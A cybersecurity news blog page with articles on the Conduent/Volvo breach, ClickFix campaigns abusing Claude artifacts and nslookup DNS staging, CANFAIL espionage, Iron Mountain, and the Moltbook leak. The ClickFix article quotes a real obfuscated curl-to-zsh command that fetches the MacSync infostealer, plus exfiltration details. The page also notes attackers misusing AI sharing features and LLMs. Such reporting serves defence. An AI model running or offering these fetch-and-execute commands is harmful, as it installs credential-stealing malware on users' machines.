Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Latest News

Microsoft Uncovers DNS-Based ClickFix Variant as Stealer Campaigns Escalate Across Windows and macOS

  Microsoft has revealed a new evolution of the ClickFix social engineering technique, where attackers manipulate users into executing comm...

All the recent news you need to know
Volvo Breach
Conduent Hack Data Breach Identity Theft Ransomware attack Volvo Breach

Volvo Hit in Conduent Breach Affecting 25 Million

 

A major data breach at business services provider Conduent has spiraled into a large-scale security incident affecting at least 25 million people across the United States, with Volvo Group North America among the latest victims. The breach, originally disclosed in early 2025, is now understood to be far more extensive than first reported, impacting residents in multiple states and exposing sensitive personal data. Texas authorities now estimate that 15 million people have been affected, up from an initial 4 million, while more than 10 million individuals in Oregon have also been caught up in the incident.

Conduent first confirmed in November 2025 that a cyberattack in January 2025 had exposed personal data belonging to over 10 million people. The compromised information included names, addresses, dates of birth, Social Security numbers, and health and insurance details, making it highly valuable for identity theft and fraud. Earlier, in April 2025, the company had revealed that attackers stole names and Social Security numbers during the same January intrusion, highlighting a pattern of gradually escalating disclosures as the scale of the breach became clearer.

Operational disruption accompanied the data exposure, as Conduent disclosed that a January cyberattack caused service outages impacting agencies in multiple U.S. states. Wisconsin and Oklahoma reported issues affecting payments and customer support, underscoring how attacks on back-office providers can cascade into interruptions of public services. Subsequent investigation determined that hackers had maintained access to Conduent’s network from October 21, 2024, to January 13, 2025, giving them ample time to exfiltrate personal data, including Social Security numbers, dates of birth, addresses, and health-related information.

The Safepay ransomware group later claimed responsibility for the attack in February 2025, adding an extortion dimension to the incident. Conduent, which offers printing and mailroom services, document processing, payment integrity, and other back-office support, has been sending breach notifications on behalf of affected clients, including Volvo Group North America. According to a filing with the Maine Attorney General, Volvo reported that 16,991 employees were impacted, and the company said it only learned of the incident in January 2026, many months after the original intrusion window.

In its notification letters, Conduent informed individuals that some of their personal information may have been involved due to services provided to their current or former health plans. The company stated it is not aware of any attempted or actual misuse of the compromised data but is urging recipients to consider steps to protect themselves. As part of its response, Conduent is offering free identity protection services to those affected, reflecting ongoing concern about long-term risks posed by the theft of such highly sensitive information.
Read more »
Mac OS
Claude Claude AI risk ClickFix ClickFix Attacks Cyber Security Google Ads Infostealer Infostealer Malware Mac OS

ClickFix Campaigns Exploit Claude Artifacts to Target macOS Users with Infostealers

 

One out of every hundred Mac users searching online might now face hidden risks. Instead of helpful tools, some find traps disguised as guides - especially when looking up things like "DNS resolver" or "HomeBrew." Behind these results, attackers run silent operations using fake posts linked to real services. Notably, they borrow content connected to Claude, spreading it through paid search ads on Google. Each click can lead straight into their hands. Two separate versions of this scheme are already circulating. Evidence suggests more than ten thousand people followed the harmful steps without knowing. Most never realized what was taken. Quiet but widespread, the pattern reveals how easily trust gets hijacked in plain sight. 

Beginning with public posts shaped by Anthropic’s AI, a Claude artifact emerges when someone shares output from the system online. Hosted on claude.ai, such material might include scripts, how-tos, or fragments of working code - open for viewing through shared URLs. During recent ClickFix operations, deceptive search entries reroute people toward counterfeit versions of these documents. Instead of genuine help, visitors land on forged Medium pieces mimicking Apple's support site. From there, directions appear telling them to insert command-line strings straight into Terminal. Though it feels harmless at first glance, that single step triggers the start of compromise. 

The technical execution of these attacks involves two primary command variants. One common method utilizes an `echo` command, which is then piped through `base64 -D | zsh` for execution. The second variant employs a `curl` command to covertly fetch and execute a remote script: `true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh`. Upon successful execution of either command, the MacSync infostealer is deployed onto the macOS system. This potent malware is specifically engineered to exfiltrate a wide array of sensitive user data, including crucial keychain information, browser data, and cryptocurrency wallet details. 

One way attackers stay hidden involves disguising their traffic as ordinary web requests. A suspicious Claude guide, spotted by Moonlock Lab analysts, reached more than 15,600 users - an indicator of wide exposure. Instead of sending raw information, the system bundles stolen content neatly into a ZIP file, often stored temporarily under `/tmp/osalogging.zip`. This package then travels outward through an HTTP POST directed at domains such as `a2abotnet[.]com/gate`. Behind the scenes, access relies on fixed credentials: a preset token and API key baked directly into the code. For extra stealth, it mimics a macOS-based browser's digital fingerprint during exchanges. When uploads stall, the archive splits into lighter segments, allowing repeated tries - up to eight attempts occur if needed. Once delivery finishes, leftover files vanish instantly, leaving minimal evidence behind.  

This latest operation looks much like earlier efforts where hackers used chat-sharing functions in major language models - like ChatGPT and Grok - to spread the AMOS infostealer. What makes the shift toward targeting Claude notable is how attackers keep expanding their methods across different AI systems. Because of this, users need to stay highly alert, especially when it comes to running Terminal instructions they do not completely trust. One useful check, pointed out by Kaspersky analysts, means pausing first to ask the same assistant about any command’s intent and risk before carrying it out.
Read more »
Social Engineering Cyberattack
CastleLoader Malware ClickFix Attack DNS Delivery GrayBravo Threat Actor Lumma Stealer Campaign malware ModeloRAT Trojan Nslookup Exploit PowerShell Abuse Social Engineering Cyberattack

New ClickFix Campaign Uses Nslookup to Fetch Malicious PowerShell Script


 

According to Microsoft, the ClickFix social engineering technique has evolved in a refined manner, emphasizing that even the most common software applications can be repurposed into covert channels for malware distribution. Using this latest iteration, hackers are no longer only relying on deceptive downloads and embedded scripts to spread malware. 

Through carefully staged prompts, they manipulate victims' trust by instructing them to execute what appears to be harmless system commands. Under this veneer of legitimacy, the command initiates a DNS query via nslookup, quietly retrieving the next-stage payload from attacker-controlled infrastructure. 

By embedding malicious intent within routine administrative behaviors, the campaign transforms a standard troubleshooting tool into an unassuming channel of infection. In Microsoft's analysis, the newly observed campaign instructs victims to use an nslookup command to query a DNS server controlled by the attacker, rather than the system's configured resolver, as directed by the attacker. 

It is designed to request a specific hostname from a remote IP address controlled by the threat actor and forward the query to that address. Instead of returning a regular DNS record, the server responds with a crafted DNS entry with a second PowerShell command embedded in the "Name" field. 

In addition, the Windows command interpreter parses and executes that response, thereby converting a standard DNS query into a covert staging mechanism for code delivery. According to Microsoft Threat Intelligence, this strategy represents another evolution of ClickFix's evasion strategy. 

While earlier versions primarily utilized HTTP-based payload retrieval, this version relies on DNS for both communication and dynamic payload distribution. In spite of the unclear lure used to persuade users, victims are reportedly instructed to execute the command through Windows Run, strengthening the tactic's dependency on social engineering rather than exploits. 

By moving execution to user-initiated system utilities, attackers are reducing the probability that conventional web or network filtering controls will be triggered. PowerShell scripts that are executed in this stage retrieve additional components from infrastructure under attacker control. 

As a result of Microsoft's investigation, it has been determined that the subsequent payload consists of a compressed archive containing a portable Python runtime along with malicious scripts. Prior to establishing persistence on the infected host, these scripts conduct reconnaissance against the host and its domain environment, gathering network and system information. 

In this method, the user creates a VBScript file in their AppData directory, and a shortcut is placed in their Windows Startup folder to ensure execution upon logon. A remote access trojan named ModeloRAT is deployed as part of the infection chain, granting the operator sustained control over compromised systems.

A DNS-based staging strategy allows adversaries to adjust payloads in real time while blending malicious traffic with routine name resolution activity by embedding executable instructions within DNS responses. As well as complicating detection, this DNS-based staging technique demonstrates that ClickFix continues to refine itself into a modular intrusion framework that is adaptable. 

In addition, Microsoft's Threat Intelligence team has assessed that the intrusion sequence is initiated by launching a command from the Windows Run dialog, which directly directs a DNS query to an adversary-controlled hard-coded external resolver. This command output is programmatically filtered to isolate the Name: field of the DNS response, and it is then executed as the second stage payload.

There has been documentation of this technique being used in multiple malware distribution campaigns, including campaigns that deliver Lumma Stealer. This malware has been detected in India, France, the United States, Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada. 

Attributed to the GrayBravo threat actor, Lumma Stealer incorporates environmental awareness checks, identifying virtualization platforms and specific security products before decrypting and executing its payload directly in memory to evade analysis and detection. 

Rather than relying on phishing emails, malvertising networks, and drive-by download schemes, ClickFix has evolved beyond its earlier reliance on these methods to move toward DNS-based staging. By exploiting procedural trust rather than software flaws, operators persuade users to execute commands to resolve benign system problems. 

A parallel campaign distributing Lumma Stealer used CastleLoader and RenEngine Loader as primary delivery mechanisms. CastleLoader has been deployed by compromised websites that present fraudulent CAPTCHA verification prompts instructing victims to use PowerShell. 

In campaigns targeting Russian, Brazilian, Turkish, Spanish, German, Mexico, Algeria, Egypt, Italy, and France users, RenEngine Loader facilitates the deployment of Hijack Loader, which eventually installs Lumma Stealer on compromised hosts. These campaigns do not have limited operational footprints to Windows environments.

The evidence suggests that macOS-targeted infostealer activity has increased dramatically in recent years, which indicates that long-held assumptions about Apple platform immunity have been eroded. In order to capitalize on the concentration of high-value software wallets within the macOS ecosystem, attackers frequently prioritize cryptocurrency theft. 

There are numerous tactics, techniques, and procedures that macOS-specific detection strategies must consider, including unsigned applications requesting elevated credentials, anomalous Terminal execution patterns, suspicious outbound connections to blockchain infrastructure that are unrelated to financial workflows, as well as attempts to exfiltrate data from Keychain repositories and browser storage media. 

In addition to ClickFix itself, many other variants and affiliate campaigns have been launched. Security analysts have documented macOS-focused operations utilizing phishing and malvertising to distribute Odyssey Stealer, a rebranded version of Poseidon Stealer. Using compromised websites that appear legitimate, attackers have hosted deceptive CAPTCHA pages that trigger the deployment of StealC information stealer via PowerShell.

Additionally, malicious SVG files have been embedded in password-protected ZIP archives, instructing victims to execute ClickFix commands, leading to the installation of Stealerium, an open-source NET infostealer that is open-source. More unconventionally, adversaries have used public sharing features of generative AI services such as Anthropic Claude to publish staged instructions for installing the ClickFix application on macOS systems. 

Search results for macOS command-line disk space analysis tools were manipulated by a campaign resulting in redirection to a fake Medium article impersonating Apple Support, which ultimately resulted in stealer payloads being delivered by external infrastructure. These developments demonstrate how ClickFix is becoming a cross-platform social engineering framework capable of adapting to diverse malware environments by demonstrating its increasing operational flexibility. 

By creating a Windows shortcut (LNK) to the previously dropped VBScript component within the Startup directory, the malware maintains long-term access by creating persistence. By ensuring that the malicious script is executed every time the operating system boots up, the infection is embedded into the routine startup sequence of the host, ensuring long-term access to the host is maintained. 

According to Bitdefender's separate findings, Lumma Stealer activity has increased significantly as a result of ClickFix-type campaigns designed around fake CAPTCHA verification prompts. This disclosure is consistent with Bitdefender's separate findings. These operations are carried out by attackers using the AutoIt-based CastleLoader malware loader associated with GrayBravo, formerly known as TAG-150. It is linked to the threat actor GrayBravo.

After detecting virtualization platforms and specific security tools, CastleLoader decrypts and executes the stealer payload in memory, a technique designed to thwart sandbox analysis and endpoint detection. 

Furthermore, CastleLoader has been distributed via websites that advertise pirated and cracked software, as well as ClickFix-driven distribution channels. A rogue installer or executable may be downloaded by users in these scenarios, masquerading as legitimate MP4 files.

In addition, counterfeit NSIS installers have been used to execute obfuscated VBA scripts prior to starting the embedded AutoIt loader responsible for installing Lumma Stealer. Using the VBA component, these systems are reinforced by scheduled tasks designed to reinforce persistence mechanisms. 

The Bitdefender assessment indicates that, despite coordinated law enforcement actions in 2025 designed to disrupt Lumma Stealer infrastructure, Lumma Stealer has demonstrated considerable resilience. 

While shifting to alternate hosting providers, operators are rotating loaders and delivery techniques to maintain infection volumes while rapidly migrating to alternative hosting providers. Several of these campaigns remain centrally located in CastleLoader, which serves as a primary distribution tool within Lumma's broader ecosystem. As a result of analyzing CastleLoader infrastructure, it was found that domains previously identified as Lumma Stealer command-and-control servers overlapped, suggesting that the two malware clusters collaborated operationally or shared service providers. 

According to infection telemetry, the largest number of Lumma Stealer cases originate in India, followed by France, the United States, Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada. In their view, ClickFix's sustained success is due not to zero-day exploits or sophisticated technical vulnerabilities but rather to the exploitation of procedural trust.

In order to reduce suspicion and increase compliance, instructions presented to victims are designed to appear like legitimate troubleshooting procedures or verification procedures. Due to this inadvertent execution of malicious code, users mistakenly believe they are resolving a routine system issue. CastleLoader is not the sole delivery mechanism facilitating Lumma Stealer's spread. 

The RenEngine Loader has also been used for campaign purposes since at least March 2025, commonly posing as game cheats or pirated commercial software such as CorelDRAW. In these attack chains, RenEngine Loader also deploys a secondary component, Hijack Loader, which installs Lumma Stealer as a result.

It is evident from these parallel loader frameworks that the Lumma distribution ecosystem is modular and adaptive, which reinforces its persistence irrespective of sustained disruption attempts. As ClickFix and its associated loader ecosystem continue to be refined, organizations must recognize a greater defensive imperative. 

Organizations cannot rely on perimeter filtering or signature-based detection alone to mitigate malicious activities originating within trusted system utilities and user workflows anymore. As part of defensive strategies, PowerShell logging should be strictly enforced, DNS queries should be monitored for anomalous patterns, and behavior detection can be used to identify command-line abuse from user-initiated processes. 

Similarly, it is crucial to implement application control policies, restrict script execution, and monitor persistent mechanisms, such as startup folder modifications and scheduled tasks, at an early stage. Training in procedural social engineering, not just phishing links and attachments, is also vital for sustained user awareness. 

Since such campaigns rely increasingly on convincing users to execute commands themselves, security programs must emphasize the risks associated with running unsolicited system instructions, regardless of how routine they appear. As ClickFix has evolved into a cross-platform, DNS-enabled staging framework, it is clear that in order to maintain defensive resilience, one must recognize and disrupt these intersections.
Read more »
Russian threat actors
CANFAIL cyber espionage Emails Google Threat Intelligence Group PhantomCaptcha phishing Russian threat actors

Google Links CANFAIL Malware Attacks to Suspected Russia-Aligned Group

 



A newly identified cyber espionage group has been linked to a wave of digital attacks against Ukrainian institutions, according to findings released by the Google Threat Intelligence Group. Investigators say the activity involves a malware strain tracked as CANFAIL and assess that the operator is likely connected to Russian state intelligence interests.

The campaign has primarily focused on Ukrainian government structures at both regional and national levels. Entities tied to defense, the armed forces, and the energy sector have been repeatedly targeted. Analysts state that the selection of victims reflects strategic priorities consistent with wartime intelligence gathering.

Beyond these sectors, researchers observed that the actor’s attention has widened. Aerospace companies, manufacturers producing military equipment and drone technologies, nuclear and chemical research institutions, and international organizations engaged in conflict monitoring or humanitarian assistance in Ukraine have also been included in targeting efforts. This broader focus indicates an attempt to collect information across supply chains and support networks linked to the war.

While the group does not appear to possess the same operational depth as some established Russian hacking units, Google’s analysts note a recent shift in capability. The actor has reportedly begun using large language models to assist in reconnaissance, draft persuasive phishing content, and resolve technical challenges encountered after gaining initial access. These tools have also been used to help configure command-and-control infrastructure, allowing the attackers to manage compromised systems more effectively.

Email-based deception remains central to the intrusion strategy. In several recent operations, the attackers posed as legitimate Ukrainian energy providers in order to obtain unauthorized access to both organizational and personal email accounts. In separate incidents, they impersonated a Romanian energy supplier that serves Ukrainian clients. Investigators also documented targeting of a Romanian company and reconnaissance activity involving organizations in Moldova, suggesting regional expansion of the campaign.

To improve the precision of their phishing efforts, the attackers compile tailored email distribution lists based on geographic region and industry sector. The malicious messages frequently contain links hosted on Google Drive. These links direct recipients to download compressed RAR archives that contain the CANFAIL payload.

CANFAIL itself is a heavily obfuscated JavaScript program. It is commonly disguised with a double file extension, such as “.pdf.js,” to make it appear as a harmless document. When executed, the script launches a PowerShell command that retrieves an additional PowerShell-based dropper. This secondary component runs directly in system memory, a technique designed to reduce forensic traces on disk and evade conventional security tools. At the same time, the malware displays a fabricated error notification to mislead the victim into believing the file failed to open.

Google’s researchers further link this threat activity to a campaign known as PhantomCaptcha. That operation was previously documented in October 2025 by researchers at SentinelOne through its SentinelLABS division. PhantomCaptcha targeted organizations involved in Ukraine-related relief initiatives by sending phishing emails that redirected recipients to fraudulent websites. Those sites presented deceptive instructions intended to trigger the infection process, ultimately delivering a trojan that communicates over WebSocket channels.

The investigation illustrates how state-aligned actors continue to adapt their methods, combining traditional phishing tactics with newer technologies to sustain intelligence collection efforts tied to the conflict in Ukraine.

Read more »
Ransomware
Cloud Corporate Cyber Attacks Data Ransomware

Iron Man Data Breach Only Impacted Marketing Resources


Data storage and recovery services company ‘Iron Mountain’ suffered a data breach. Extortion gang ‘Everest’ was behind the breach. Iron Mountain said the breach was limited to marketing materials. The company specializes in records management and data centers, it has more than 240,000 customers globally in 61 countries. 

About the breach 

The gang claimed responsibility on the dark web, claiming to steal 1.4 TB of internal company documents. Threat actors used leaked login credentials to access a single folder on a file-sharing server having marketing materials. 

Experts said that Everest actors didn't install any ransomware payloads on the server, and no extra systems were breached. No sensitive information was exposed. The compromised login accessed one folder that had marketing materials. 

The Everest ransomware group started working from 2020. It has since changed its tactics. Earlier, it used to encrypt target's systems via ransomware. Now, it focuses on data-theft-only corporate extortion. Everest is infamous for acting as initial access broker for other hackers and groups. It also sells access to compromised networks. 

History 

In the last 5 years, Everest’s victim list has increased to hundreds in its list portal. This is deployed in double-extortion attacks where hackers blackmail to publish stolen files if the victims don't pay ransom. 

The U.S. Department of Health and Human Services also issued a warning in August 2024 that Everest was increasingly focusing on healthcare institutions nationwide. More recently, the cybercrime operation removed its website in April 2025 after it was vandalized and the statement "Don't do crime CRIME IS BAD xoxo from Prague" was posted in its place.

If the reports of sensitive data theft turn out to be accurate, Iron Mountain's clients and partners may be at risk of identity theft and targeted phishing. Iron Mountain's present evaluation, however, suggests that the danger is restricted to the disclosure of non-confidential marketing and research documents. 

What is the impact?

Such purported leaks usually result in short-term reputational issues while forensic investigations are being conducted. Iron Mountain has deactivated the compromised credential as a precaution and is still keeping an eye on its systems. 

Vendors or affected parties who used the aforementioned file-sharing website should be on the lookout for odd communications. Iron Mountain's response to these unsubstantiated allegations must be transparent throughout the investigation.

Read more »
Wiz security research
AI social network risk Data Breach Moltbook security breach Supabase API key exposure Wiz security research

Moltbook Data Leak Reveals 1.5 Million Tokens Exposed in AI Social Platform Security Flaw

 



Moltbook has recently captured worldwide attention—not only for its unusual concept as a dystopian-style social platform centered on artificial intelligence, but also for significant security and privacy failures uncovered by researchers.

The platform presents itself as a Reddit-inspired network built primarily for AI agents. Developed using a “vibe-coded” approach—where the creator relied on AI tools to generate the code rather than writing it manually—Moltbook allows users to observe AI agents conversing with one another. These exchanges reportedly include topics such as existential reflection and discussions about escaping human control.

However, cybersecurity firm Wiz conducted an in-depth review of the platform and identified serious flaws. According to its findings, the AI agents interacting on the site were not entirely autonomous. More concerningly, the platform exposed sensitive user information affecting thousands.

In its report, Wiz said it performed a “non-intrusive security review” by navigating the platform as a regular user. Within minutes, researchers discovered a Supabase API key embedded in client-side JavaScript. The exposed key granted unauthenticated access to the production database, allowing both read and write operations across all tables.

“The exposure included 1.5 million API authentication tokens, 35,000 email addresses, and private messages between agents. We immediately disclosed the issue to the Moltbook team, who secured it within hours with our assistance, and all data accessed during the research and fix verification has been deleted,” the researchers explained.

The team clarified that the presence of a visible API key “does not automatically indicate a security failure,” noting that Supabase is “designed to operate with certain keys exposed to the client.” However, in this case, the backend configuration created a critical vulnerability.

“Supabase is a popular open-source Firebase alternative providing hosted PostgreSQL databases with REST APIs,” Wiz explained. “When properly configured with Row Level Security (RLS), the public API key is safe to expose - it acts like a project identifier. However, without RLS policies, this key grants full database access to anyone who has it. In Moltbook’s implementation, this critical line of defense was missing.”

Beyond the data exposure, the investigation also cast doubt on Moltbook’s central claim of hosting a fully autonomous AI ecosystem. Researchers concluded that human operators were significantly involved behind the scenes. “The revolutionary AI social network was largely humans operating fleets of bots.”

For now, Moltbook’s vision of independent AI entities engaging freely online appears to remain closer to speculative fiction than technological reality.
Read more »
Subscribe to: Comments (Atom)

Featured